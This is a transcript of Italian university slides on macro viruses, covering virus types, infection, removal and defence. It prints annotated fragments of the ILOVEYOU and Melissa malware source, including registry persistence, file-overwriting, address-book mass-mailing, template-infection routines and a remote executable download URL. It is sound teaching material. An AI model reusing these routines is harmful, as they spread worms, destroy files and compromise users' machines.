MACRO VIRUS MACRO VIRUS. dsfsdfdsf. Sicurezza su reti. Sicurezza su reti

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "MACRO VIRUS MACRO VIRUS. dsfsdfdsf. Sicurezza su reti. Sicurezza su reti"

Transcript

1 MACRO VIRUS MACRO VIRUS UNIVERSITA DEGLI STUDI DI SALERNO Dott.ssa Barbara Masucci Realizzato da: Cuozzo Piergiuseppe Malangone Alessandro Tipi Virus Definizione di Macro Virus Come agisce un Macro Virus Problemi causati Infezione e rimozione In dettaglio I love You Melissa Come difendersi MACRO VIRUS 1 MACRO VIRUS 2 Cosa sono i virus Tipi di virus Il Virus si distingue da un normale programma per tre caratteristiche fondamentali: E' ospite in un file eseguibile, in un settore di boot,, o in un file di documento. Si autoreplica. Compie tutte queste operazioni in maniera nascosta all'utente. Bombe ANSI Bombe logiche A Cifratura del codice Residenti in memoria Virus companion Virus di macro Virus multipartito Virus del file system Cavalli di Troia Worm Polimorfici MACRO VIRUS 3 MACRO VIRUS 4 Che cos è una MACRO Macro Virus - Definizione Le Macro sono delle procedure automatizzate che permettono di eseguire diverse procedure in sequenza. Esempio di Macro: I macro virus sono generalmente script incorporati all'interno di particolari documenti (come ad esempio MS Word,Excel) Possono essere eseguiti all atto dell apertura di un documento. Il mezzo principale di trasmissione di questi virus sono le . Vanno ad infettare il modello che i programmi utilizzano per creare nuovi documenti. MACRO VIRUS 5 MACRO VIRUS 6 1

2 Macro Virus - Definizione Problemi causati Il file globale Normal.dot mantiene tutte le informazioni su un nuovo documento:la formattazione, il tipo di carattere e la dimensione, ecc.. La capacità del virus di duplicarsi è garantita dalla possibilità di essere eseguito automaticamente al momento dell apertura di un file. Cancellazione di icone. Cancellazione di dati. Occupazione di memoria e blocco del sistema. Salvataggio dei documenti solo in formato.txt MACRO VIRUS 7 MACRO VIRUS 8 Smascherare i Macro Virus Protezione da Macro Aprendo la voce Macro nel menu Strumenti appariranno macro con nomi composti dalle seguenti parole: ToolsMacro, Payload ; AAAZAO, AAAZF; "virus, InsertPayLoad. Per proteggersi dai Macro Virus si deve attivare la protezione da Macro potenzialmente non sicure tramite il menu Strumenti/Macro/Protezione, scegliendo il relativo livello di protezione. Non sempre valido MACRO VIRUS 9 MACRO VIRUS 10 Protezione da Macro Protezione da Macro Se la protezione è attivata, ogni volta che si apre un documento Word contenente una macro, viene visualizzata una finestra di dialogo in cui è possibile scegliere di attivare le macro. Si può anche selezionare l opzione Richiedi salvataggio modello Normal dalla finestra di dialogo Opzioni/Salva nel menu strumenti. MACRO VIRUS 11 MACRO VIRUS 12 2

3 Rimozione Macro Virus più comuni 1. Eliminare il file Normal.dot e sostituirlo con un file normal.dot pulito,tramite il menu Strumenti/Modelli. 2. Attivare la protezione da Macro Virus. 3. Aprire tutti i file di Word. 4. Cancellare il codice virale nell editor di Visul Basic, nei documenti che contengono una macro. 5. Salvare il file con un altro nome, chiudere il tutto ed eliminare il vecchio file. Ripulito il file passare agli altri procedendo nello stesso modo. Word Macro/Concept Word Macro/Atom Word Macro/Bandung Word Macro/Colors Word Macro/Nuclear Melissa I Love You MACRO VIRUS 13 MACRO VIRUS 14 I Love You I Love You - L autore Il mese di Maggio del 2000 è stato segnato dalla comparsa del virus "I Love You. Scritto in Visual Basic Script, linguaggio prossimo a Visual Basic. Si propagava per sotto forma di allegato. Con un nome così accattivante furono molte le vittime a cadere nel tranello. L autore: Onel De Guzman Uno dei migliori studenti dell'ama, una catena di college informatici molto popolare nel Sus-Est asiatico. Lì entrò a far parte di un gruppo chiamato Grammersoft. Sarà proprio quel fatidico nome, ritrovato all'interno dello script di I love you, a convogliare i sospetti su di lui. Ritenuto responsabile di aver creato e immesso in rete il virus informatico più dannoso mai creato. MACRO VIRUS 15 MACRO VIRUS 16 Il codice è composto da 8 subroutines : main() regruns() listadriv infectfiles(folderspec) folderlist (folderspec) regcreate(regkey, regvalue) spreadto () html() e dalle tre funzioni: regget(value) fileexist() folderexist(folderspec) Le prime righe del codice del virus sono dedicate ai commenti e alle impostazioni di alcune variabili che poi saranno usate nel programma. Le due prime righe del code source corrispondono alla firma degli autori del virus, firma che dall'inizio ha fatto pensare che il virus provenisse dalle filippine. rem barok -loveletter(vbe) rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / Group / Manila,Philippines MACRO VIRUS 17 MACRO VIRUS 18 3

4 Neutralizza le difese da macro sub regruns() On Error Resume Next Dim num,downread set fso = CreateObject("Scripting.FileSystemObject ) set file = fso.opentextfile(wscript.scriptfullname,1) vbscopy=file.readall Crea la variabile oggetto per la lettura dei file presenti sul disco La sub main() imposta alcune variabili usate nelle successive routine e crea nell'ordine i tre files "MSKernel32.vbs", "Win32DLL.VBS" e LOVE-LETTER-FOR-YOU.TXT.vbs". Set dirwin = fso.getspecialfolder(0) Set dirsystem = fso.getspecialfolder(1) Set dirtemp = fso.getspecialfolder(2) Set c = fso.getfile(wscript.scriptfullname) c.copy(dirsystem&"\mskernel32.vbs") files c.copy(dirwin&"\win32dll.vbs") c.copy(dirsystem&"\love-letter-for-you.txt.vbs") [...] Main( ) MACRO VIRUS 19 MACRO VIRUS 20 I Love You Codice In seguito vengono lanciate le seguenti routines: regruns() html() La procedura regruns infetta la base dei registri con il fine di spreadto () eseguire il virus ad ogni avvio del PC. listadriv() regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ Run\MSKernel32",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ RunServices\Win32DLL",dirwin&"\Win32DLL.vbs" MACRO VIRUS 21 Individua la directory impostata di default per lo scaricamento dei file da internet e verifica l esistenza del file "WinFAT32.exe" nella directory di Windows. downread="" downread=regget("hkey_current_user\software\ Microsoft\InternetExplorer\Download Directory") Se non esiste prende come default C:\ if (downread="") then downread="c:\" MACRO VIRUS 22 Se esiste "WinFAT32.exe" nella directory di Windows il virus modifica (attraverso il Registro) la Pagina Iniziale di MS Internet Explorer inserendo l indirizzo del file "WIN-BUGFIX.EXE" posto in una sottodirectory del sito La sub verifica poi l'esistenza del file WIN-BUGSFIX.exe nella directory predefinita per il download e imposta il Registro per eseguirlo a ogni avvio del computer. if (fileexist(dirsystem&"\winfat32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj w gvsdf7679njbvyt/win-bugsfix.exe" if (fileexist(downread&"\win-bugsfix.exe")=0) then regcreate"hkey_local_machine\software\microsoft\windows\current Version\Run\WIN- BUGSFIX",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StartPage","about:blank" Dopodiché la Pagina Iniziale di Explorer diventa "about:blank" end sub MACRO VIRUS 23 MACRO VIRUS 24 4

5 Verifica i driver presenti sul disco e per ogni unità esegue la funzione folderlist( ). listdriv ( ) Infectfiles( ) Sostituisce i file: Script,JPEG, mp3 con una copia del virus. Ricerca il programma mirc al fine di propagarsi ad altri utenti. folderlist( ) Chiama la funzione infectfiles ( ) if (ext="vbs") or (ext="vbe") then set ap=fso.opentextfile(f1.path,2,true) ap.write vbscopy Individua e cancella tutti i files con estensione:*.vbs, *.vbe ap.close MACRO VIRUS 25 MACRO VIRUS 26 Idem con i file con estensione.css,.whs e js che sono cancellati e rimpiazzati da file con lo stesso nome ma aventi l'estensione.vbs elseif(ext="jpg") or (ext="jpeg") then set ap=fso.opentextfile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.getfile(f1.path) cop.copy(f1.path&".vbs") fso.deletefile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.createtextfile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.getfile(f1.path) att.attributes=att.attributes+2 MACRO VIRUS 27 Il virus I Love You testa infine il nostro computer per verificare la presenza del programma mirc, creando nella sua cartella il file SCRIPT.INI, contenente i comandi per inviare una pagina html contenente la copia del virus. if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set [scriptini=fso.createtextfile(folderspec&"\script.ini") scriptini.writeline "[script]" scriptini.writeline ";mirc Script" scriptini.writeline "; Please dont edit this script... mirc will corrupt,... MACRO VIRUS 28 La routine html() crea una pagina HTML contente il codice virale nella directory di Windows con il nome "LOVE-LETTER-FOR- YOU.HTM", che sarà trasmessa ai vari corrispondenti via IRC.. Questa pagina HTML contiene un ActiveX (vbscript) con il fine di richiamare l'attenzione della vittima. MACRO VIRUS 29 regcreate( )Imposta i registri di sistema spreadto ( ) crea il messaggio contenente il virus e lo spedisce a tutti i membri della rubrica. regv=regedit.regread("hkey_current_user\software\microsoft\wab\"&a) if (regv="") then regv=1 Il virus richiama l'applicazione Wab.exe, una rubrica di Outlook. if (int(a.addressentries.count)>int(regv)) then for ctrentries=1 to a.addressentries.count maled=a.addressentries(x) reagd="" regad=regedit.readread("hkey_current_user\software\microsoft\wab\"&malead) if (regad="") then MACRO VIRUS 30 5

6 I Love You - Rimozione Viene creato il messaggio contenente il virus e spedito a tutti i membri della rubrica. Vediamo inoltre che il soggetto che contiene il virus e "I Love You", e che il corpo del messaggio, vale a dire il testo è "Kindly check the attacched loveletter coming from me". set male=out.createitem(0) male.recipients.add(maled) male.subject = "ILOVEYOU" male.body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.attachments.add(dirsystem&"\love-letter-for-you.txt.vbs") male.send regedit.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Wab\ "&malead,1,"reg_dword" MACRO VIRUS 31 Rimuovere i file: LOVE-LETTER-FOR-YOU.HTM (dalla cartella di sistema) WIN-BUGSFIX.EXE, WINFAT32.EXE (dalla cartella dei file scaricati da internet).vbs (da tutte le cartella del sistema) SCRIPT.INI (nella cartella di mirc) MACRO VIRUS 32 Melissa Melissa Diffusione e attivazione Si tratta di un virus macro di Word trasmesso tramite posta elettronica in un documento Word allegato. W97 M/Melissa.A Il messaggio contiene: La dicitura "Important Message From "nome utente" nel campo dell'oggetto. Il testo "Here is that document you asked for... don't show anyone else ;-)" Diffusione tramite posta elettronica con un file list.doc allegato. E in grado di propagarsi inviando messaggi di posta elettronica ai primi 50 indirizzi in rubrica. Il virus possiede anche una particolare routine la cui azione viene eseguita solo nel caso in cui il numero del giorno corrisponda a quello dei minuti. MACRO VIRUS 33 MACRO VIRUS 34 Melissa Descrizione tecnica Melissa Trasmissione Nome della macro infetta in cui vengono ignorati gli errori quando Melissa è in esecuzione e neutralizzate le difese di Word. Private Sub Document_Open() On Error Resume Next End Sub If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for... don't show anyone else ;-)" Si autospedisce ai primi 50 indirizzi nella rubrica Nel "soggetto" (subject) del messaggio viene inserito il testo "Important Message From [UsareName]" (UserName è una variabile e conterrà il nome dell'utente di Outlook). Nel corpo del messaggio viene scritto il testo "Here is that document you asked for... don't show anyone else ;-)" MACRO VIRUS 35 MACRO VIRUS 36 6

7 Melissa Trasmissione BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff Allega il documento infetto alla posta e poi spedisce l . System.PrivateProfileString("", "HKEY_CURRENT_USER \Software\Microsoft \Office\", "Melissa?") = "... by Kwyjibo " Prima dell'invio, il virus controlla il Registro di sistema ricercando una chiave particolare. Il codice del virus contiene un modulo chiamato "Melissa", nel quale è presente una funzione automatica: "Document_Open" "Document_Close" Il virus infetta il modello NORMAL.DOT quando vengono aperti dei documenti infetti e si diffonde ad altri documenti quando questi ultimi vengono chiusi. MACRO VIRUS 37 MACRO VIRUS 38 Infetta il documento corrente... Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1=NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name<>"Melissa" Then If ADCL > 0 Then ADI1.CodeModule.DeleteLines1, ADCL SetToInfect= ADI1 ADI1.Name = "Melissa" DoAD = True MACRO VIRUS 39 Copia il virus nella macro Document_Close... If Dont = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines1 Loop ToInfect.CodeModule.AddFromString("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLinesBGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop MACRO VIRUS 40 Copia il virus nella macro Document_Open... If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines Loop ToInfect.CodeModule.AddFromString("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop Salva il documento infetto WORD/Melissa written by Kwyjibo Works in both Word 2000 and Word 97 Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! Word -> Word 97 <--> Word it's a new age! CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1,ActiveDocument.Name, "Document"=False)Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1,ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved=True Commenti MACRO VIRUS 41 MACRO VIRUS 42 7

8 Melissa Trigger Routine Melissa Come difendersi Il Virus contiene anche una speciale routine. If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub Verificare che la protezione da virus macro di Office sia attivata. Eseguire un programma anti-virus aggiornato e controllare il sistema con frequenza. Eliminare o rinominare il file Normal.dot. Questo modello globale di Word viene ricreato automaticamente all'avvio di Word. MACRO VIRUS 43 MACRO VIRUS 44 Come difendersi sicura Antivirus Profilassi informatica sicura Molti virus sono allegati ai messaggi con nomi invitanti oppure sono infilati dentro al codice HTML dei messaggi stessi sotto forma di script. Alcuni metodi di mascheramento: File Spoofing R er Anonimi Verificare le regole di base del client di posta Se necessario utilizzare programmi specifici PGP Firma digitale tramite società dedicate Registrare un account con transazione protetta con crittografia e passphrase su MACRO VIRUS 45 MACRO VIRUS 46 Tipologie di antivirus-principi di funzionamento Tipologie di antivirus-principi di funzionamento Software scritti per intercettare, prevenire ed eliminare l'azione di virus e di altri tipi di malware. In genere vi sono tre tipi di AntiVirus:Monitoraggio, Scanner e di Rilevamento. Altri tipi di protezione possono essere da scrittura, lettura,... DI MONITORAGGIO Tentano di prevenire un'infezione controllando attività sospette (riformattare un disco,...). SCANNER Ricercano nel sistema (file, memoria e settori di avvio) le stringhe caratteristiche dei virus conosciuti. DI RILEVAMENTO Verificatori dell integrità (utile per la rilevazione di virus che modificano la struttura dei file). Tecnica euristica (ricerca le istruzioni e i funzionamenti sospetti) Programmi di decrittazione generica (utilizzati per rilevare i virus criptati e polimorfici). MACRO VIRUS 47 MACRO VIRUS 48 8

9 Tipologie di antivirus-l attacco dei retrovirus Tipologie di antivirus-l attacco dei retrovirus Un problema molto importante riguarda l'efficienza dell'antivirus a respingere attacchi di tipo retrovirale. Per attacchi "retrovirali", si intendono quelli in cui il virus è in grado di aggirare e disattivare l'antivirus, o comunque di renderlo inefficace nei confronti del virus stesso. A prescindere dalle caratteristiche di ogni singolo antivirus, le componenti essenziali sono le seguenti: Interfaccia grafica(programma o servizio eseguibile.exe) Driver di scansione (driver di sistema.vxd, o.sys) Come mai è possibile che un worm che opera come un programma eseguibile, possa in qualche maniera compromettere la sicurezza di un antivirus? I due moduli sono in continuo contatto tra di loro e quando il modulo eseguibile viene disabilitato anche la parte relativa al driver smette di funzionare. MACRO VIRUS 49 MACRO VIRUS 50 Profilassi informatica Profilassi informatica (2) Non aprire file con estensioni 386, BIN, CMD, DEV, DLL, DOC, DOT, EXE, INF MD?, MPP, MPT, OBT, OLE, XL?, VXD, OVL, PP?, POT, PIF SCR, SHS, SYS, VBS, XPT senza averli controllati con un antivirus aggiornato. Utilizzare un server di posta che faccio un controllo antivirus. Disattivare qualsiasi funzione di visualizzazione automatica. Installare e tenere aggiornato un firewall. Compiere Backup regolari Verificare ogni nuovo software o dischetto Prepararsi al sicuro un disco di Boot pulito per compiere la scansione Prestare attenzione a nuovi comportamenti del PC: Improvvisi crash del sistema Quando un programma generico di monitoraggio dà un allarme L'impossibilità di avviare il proprio computer con messaggi del tipo "missing operating system Comportamenti inusuali MACRO VIRUS 51 MACRO VIRUS 52 9

La diffusione dei virus informatici nel mondo ad Agosto 2001 in base alla percentuale di infezioni sul totale

La diffusione dei virus informatici nel mondo ad Agosto 2001 in base alla percentuale di infezioni sul totale Macro Virus Bruno Marisa Radica Diego Sessa Clelia Realizzato Da: MARISA.BRUNO@poste. it diego.radica@libero..radica@libero.itit clelia28@interfree.itit Macro Virus 1 Che cos è un virus. Definizione di

Dettagli

Codice malizioso. Codice malizioso. Il termine Virus. Codice malizioso

Codice malizioso. Codice malizioso. Il termine Virus. Codice malizioso Codice malizioso Codice malizioso Barbara Masucci Dipartimento di Informatica ed Applicazioni Università di Salerno masucci@dia.unisa.it http://www.dia.unisa.it/professori/masucci Dopo una violazione del

Dettagli

Modulo 1. Concetti di base della Tecnologia dell Informazione ( Parte 1.7) Rielaborazione dal WEB: prof. Claudio Pellegrini - Sondrio

Modulo 1. Concetti di base della Tecnologia dell Informazione ( Parte 1.7) Rielaborazione dal WEB: prof. Claudio Pellegrini - Sondrio Modulo 1 Concetti di base della Tecnologia dell Informazione ( Parte 1.7) Rielaborazione dal WEB: prof. Claudio Pellegrini - Sondrio La sicurezza dei sistemi informatici Tutti i dispositivi di un p.c.

Dettagli

Talento LAB 8.1 - LA GESTIONE DEI VIRUS I VIRUS INFORMATICI. In questa lezione imparerete a:

Talento LAB 8.1 - LA GESTIONE DEI VIRUS I VIRUS INFORMATICI. In questa lezione imparerete a: LAB 8.1 - LA GESTIONE DEI VIRUS In questa lezione imparerete a: Definire cos è un virus informatico e quali possono essere i suoi effetti, Stabilire i vari metodi di contagio, Comprendere i vantaggi di

Dettagli

CORSO EDA Informatica di base. Sicurezza, protezione, aspetti legali

CORSO EDA Informatica di base. Sicurezza, protezione, aspetti legali CORSO EDA Informatica di base Sicurezza, protezione, aspetti legali Rischi informatici Le principali fonti di rischio di perdita/danneggiamento dati informatici sono: - rischi legati all ambiente: rappresentano

Dettagli

Progetto di Sicurezza dei Sistemi Informatici: I virus e la loro storia

Progetto di Sicurezza dei Sistemi Informatici: I virus e la loro storia Progetto di Sicurezza dei Sistemi Informatici: I virus e la loro storia Studente: Statello Christian ( A40/000213 ) 2008-2009 1 1. Introduzione..pag 3 2. Cos è un virus, dove si trova e come funziona..pag

Dettagli

SidekickPC 3.0 Risoluzione Problemi 31 MAGGIO 2012

SidekickPC 3.0 Risoluzione Problemi 31 MAGGIO 2012 SidekickPC 3.0 Risoluzione Problemi 31 MAGGIO 2012 2012 Electrolux Italia S.p.A., All rights reserved INDICE 1. ERRORI DI PROGRAMMA DOPO AGGIORNAMENTO ALLA VERSIONE 3.0... 2. MESSAGGI NELLA FINESTRA DI

Dettagli

CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS CARATTERISTICHE - TIPI PROTEZIONE

CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS CARATTERISTICHE - TIPI PROTEZIONE - CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS CARATTERISTICHE - TIPI PROTEZIONE Di cosa parleremo Definizioni di virus e malware. Danni che i virus possono provocare. Rimedi che possiamo applicare.

Dettagli

Sicurezza dei file Le protezioni nei programmi

Sicurezza dei file Le protezioni nei programmi Sicurezza dei file Le protezioni nei programmi Attivare/disattivare le impostazioni di sicurezza delle macro. Una macro è un insieme d istruzioni che il computer interpreta una dopo l altra e traduce in

Dettagli

CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS. R.Remoli

CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS. R.Remoli - CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS CARATTERISTICHE - TIPI PROTEZIONE R.Remoli Di cosa parleremo Definizioni di virus e malware. Danni che i virus possono provocare. Rimedi che possiamo

Dettagli

COME UTILIZZARLO 1) Scaricare il software dall indirizzo http://it.clamwin.com/content/view/18/46/

COME UTILIZZARLO 1) Scaricare il software dall indirizzo http://it.clamwin.com/content/view/18/46/ A PROPOSITO DI SICUREZZA DEL PC E DI ANTIVIRUS CLAMWIN 0.94.1 http://it.clamwin.com/ ClamWin è un antivirus gratuito per Microsoft Windows 98/Me/2000/XP/2003/Vista. ClamWin Free Antivirus è dotato di un

Dettagli

Come difendersi dai VIRUS

Come difendersi dai VIRUS Come difendersi dai VIRUS DEFINIZIONE Un virus è un programma, cioè una serie di istruzioni, scritte in un linguaggio di programmazione, in passato era di solito di basso livello*, mentre con l'avvento

Dettagli

Navigazione in modalità InPrivate Browsing

Navigazione in modalità InPrivate Browsing G. Pettarin ECDL Modulo 7: Internet 52 Se selezioni questa modalità di navigazione si apre una nuova finestra del browser, come quella nella figura sottostante. Navigazione in modalità InPrivate Browsing

Dettagli

BOLLETTINO DI SICUREZZA INFORMATICA

BOLLETTINO DI SICUREZZA INFORMATICA STATO MAGGIORE DELLA DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio CERT Difesa CC BOLLETTINO DI SICUREZZA INFORMATICA N. 1/2009 Il bollettino può essere

Dettagli

Le reti di calcolatori

Le reti di calcolatori Le reti di calcolatori 106 Le reti di calcolatori 1 Una rete è un complesso insieme di sistemi di elaborazione connessi tra loro tramite collegamenti fisici (linee telefoniche, cavi dedicati, etc.) o con

Dettagli

MODULO 7 SEZIONE 2 Utilizzo di Outlook Express 6.0 (Windows XP)

MODULO 7 SEZIONE 2 Utilizzo di Outlook Express 6.0 (Windows XP) 7.4 POSTA ELETTRONICA MODULO 7 SEZIONE 2 Utilizzo di Outlook Express 6.0 (Windows XP) prima parte 7.4.1 Concetti e termini 7.4.1.1 Capire come è strutturato un indirizzo di posta elettronica Tre parti

Dettagli

ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE

ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE PREMESSA La presente guida è da considerarsi come aiuto per l utente per l installazione e configurazione di Atollo Backup. La guida non vuole approfondire

Dettagli

Creazione Account PEC (Posta Elettronica Certificata)

Creazione Account PEC (Posta Elettronica Certificata) Creazione Account PEC (Posta Elettronica Certificata) Come già specificato, il software è stato realizzato per la gestione di account PEC (Posta Elettronica Certificata), ma consente di configurare anche

Dettagli

F-Secure Anti-Virus for Mac 2015

F-Secure Anti-Virus for Mac 2015 F-Secure Anti-Virus for Mac 2015 2 Sommario F-Secure Anti-Virus for Mac 2015 Sommario Capitolo 1: Operazioni preliminari...3 1.1 Gestione abbonamento...4 1.2 Come verificare che il computer sia protetto...4

Dettagli

Che cosa è un VIRUS?

Che cosa è un VIRUS? Virus & Antivirus Virus Nella sicurezza informatica un virus è un software, appartenente alla categoria dei malware, che è in grado, una volta eseguito, di infettare dei file in modo da riprodursi facendo

Dettagli

IL SISTEMA APPLICATIVO WORD

IL SISTEMA APPLICATIVO WORD Programma di Alfabetizzazione informatica Corso di II^ livello a.s. 2014/2015 IL SISTEMA APPLICATIVO WORD Approfondimenti del Menu pricipale di Word : inserisci, formato, strumenti Personalizzazione di

Dettagli

Capitolo 1: Operazioni preliminari...3

Capitolo 1: Operazioni preliminari...3 F-Secure Anti-Virus for Mac 2014 Sommario 2 Sommario Capitolo 1: Operazioni preliminari...3 1.1 Operazioni da effettuare in seguito all'installazione...4 1.1.1 Gestione abbonamento...4 1.1.2 Come aprire

Dettagli

Usare la webmail Microsoft Hotmail

Usare la webmail Microsoft Hotmail Usare la webmail Microsoft Hotmail Iscriversi ad Hotmail ed ottenere una casella di posta Innanzitutto è necessario procurarsi una casella di posta elettronica (detta anche account di posta elettronica)

Dettagli

ESET NOD32 Antivirus 4 per Linux Desktop. Guida all'avvio rapido

ESET NOD32 Antivirus 4 per Linux Desktop. Guida all'avvio rapido ESET NOD32 Antivirus 4 per Linux Desktop Guida all'avvio rapido ESET NOD32 Antivirus 4 fornisce una protezione all'avanguardia per il computer contro codici dannosi. Basato sul motore di scansione ThreatSense

Dettagli

Sophos Endpoint Security and Control Guida di avvio per computer autonomi

Sophos Endpoint Security and Control Guida di avvio per computer autonomi Sophos Endpoint Security and Control Guida di avvio per computer autonomi Sophos Endpoint Security and Control versione 9 Sophos Anti-Virus per Mac OS X, versione 7 Data documento: ottobre 2009 Sommario

Dettagli

Guida all'installazione (Italiano) Primi passi

Guida all'installazione (Italiano) Primi passi Primi passi Guida all'installazione (Italiano) Siamo lieti che Lei abbia deciso di acquistare il nostro prodotto e speriamo che resterà pienamente soddisfatto del suo nuovo software. In caso di problemi

Dettagli

CORSO 01: INFORMATICA DI BASE

CORSO 01: INFORMATICA DI BASE CORSO 01: INFORMATICA DI BASE PARTIRE DA ZERO 1.01 Hardware e Software 1.02 Conoscere l'hardware USARE IL PC con WINDOWS VISTA e 7(Seven) 1.03 Usare il sistema operativo Windows 7 e Vista 1.04 Controllare

Dettagli

Impostare il browser per navigare in sicurezza Opzioni di protezione

Impostare il browser per navigare in sicurezza Opzioni di protezione Impostare il browser per navigare in sicurezza Opzioni di protezione Data la crescente necessità di sicurezza e tutela dei propri dati durante la navigazione in rete, anche gli stessi browser si sono aggiornati,

Dettagli

I.T.C.G. DE SIMONI PROGETTO ECDL

I.T.C.G. DE SIMONI PROGETTO ECDL I.T.C.G. DE SIMONI PROGETTO ECDL USO DEL COMPUTER E GESTIONE FILES Referente e tutor Prof.ssa Annalisa Pozzi Tutor lezioni Prof. Claudio Pellegrini 2.3 Utilità 2.3.1 Compressione dei files 2.3.1.1 Comprendere

Dettagli

Corso di Informatica

Corso di Informatica Corso di Informatica CL3 - Biotecnologie Orientarsi nel Web Prof. Mauro Giacomini Dott. Josiane Tcheuko Informatica - 2006-2007 1 Obiettivi Internet e WWW Usare ed impostare il browser Navigare in internet

Dettagli

Guida all installazione di METODO

Guida all installazione di METODO Guida all installazione di METODO In questo documento sono riportate, nell ordine, tutte le operazioni da seguire per una corretta installazione di Metodo. Per procedere con l installazione è necessario

Dettagli

Insegnamento di Informatica CdS Scienze Giuridiche A.A. 2007/8. La sicurezza

Insegnamento di Informatica CdS Scienze Giuridiche A.A. 2007/8. La sicurezza Insegnamento di Informatica CdS Scienze Giuridiche A.A. 2007/8 La sicurezza Prof. Valle D.ssa Folgieri Lez 10 del 23 11.07 Informatica e sicurezza 1 La sicurezza Connessione ad Internet diventata essenziale

Dettagli

PROGRAMMA COMPLETO DI INFORMATIZZAZIONE. Partire da Zero. Usare il PC

PROGRAMMA COMPLETO DI INFORMATIZZAZIONE. Partire da Zero. Usare il PC PROGRAMMA COMPLETO DI INFORMATIZZAZIONE Hardware e Software Partire da Zero Conoscere l'hardware (i componenti interni, le porte,[ ]) Tipi di computer e dispositivi digitali in commercio (PC Desktop e

Dettagli

Indice I rischi: introduzione alle reti connesse a Internet Le reti e il protocollo TCP/IP

Indice I rischi: introduzione alle reti connesse a Internet Le reti e il protocollo TCP/IP Indice Capitolo 1 I rischi: introduzione alle reti connesse a Internet 1 1.1 Il virus Worm 3 1.2 Lo stato della rete nel 2002 9 1.3 Cos è Internet 10 1.4 La commutazione di pacchetti: la base della maggior

Dettagli

Difenditi dai Malware

Difenditi dai Malware con la collaborazione di Difenditi dai Malware Pensi che il PHISHING sia solo un tipo di pesca? Pensi che i COOKIE siano solo biscotti? Pensi che un VIRUS sia solo un raffreddore? Difenditi dai Malware

Dettagli

MODULO 2 USO DEL COMPUTER E GESTIONE DEI FILE. A cura degli alunni della VD 2005/06 del Liceo Scientifico G. Salvemini di Sorrento NA

MODULO 2 USO DEL COMPUTER E GESTIONE DEI FILE. A cura degli alunni della VD 2005/06 del Liceo Scientifico G. Salvemini di Sorrento NA MODULO 2 USO DEL COMPUTER E GESTIONE DEI FILE A cura degli alunni della VD 2005/06 del Liceo Scientifico G. Salvemini di Sorrento NA Supervisione prof. Ciro Chiaiese SOMMARIO 2.1 L AMBIENTE DEL COMPUTER...

Dettagli

per Mac Guida all'avvio rapido

per Mac Guida all'avvio rapido per Mac Guida all'avvio rapido ESET Cybersecurity fornisce una protezione all'avanguardia per il computer contro codici dannosi. Basato sul motore di scansione ThreatSense introdotto per la prima volta

Dettagli

PROCEDURE GENERALI ATTIVAZIONE MACRO

PROCEDURE GENERALI ATTIVAZIONE MACRO PROCEDURE GENERALI OBIETTIVO Attivazione macro GUIDA ALL UTILIZZO PREMESSA COS È UNA MACRO ATTIVAZIONE MACRO Che cos è una macro? Una macro è un automazione tramite software VBA (Visual Basic for Applications)

Dettagli

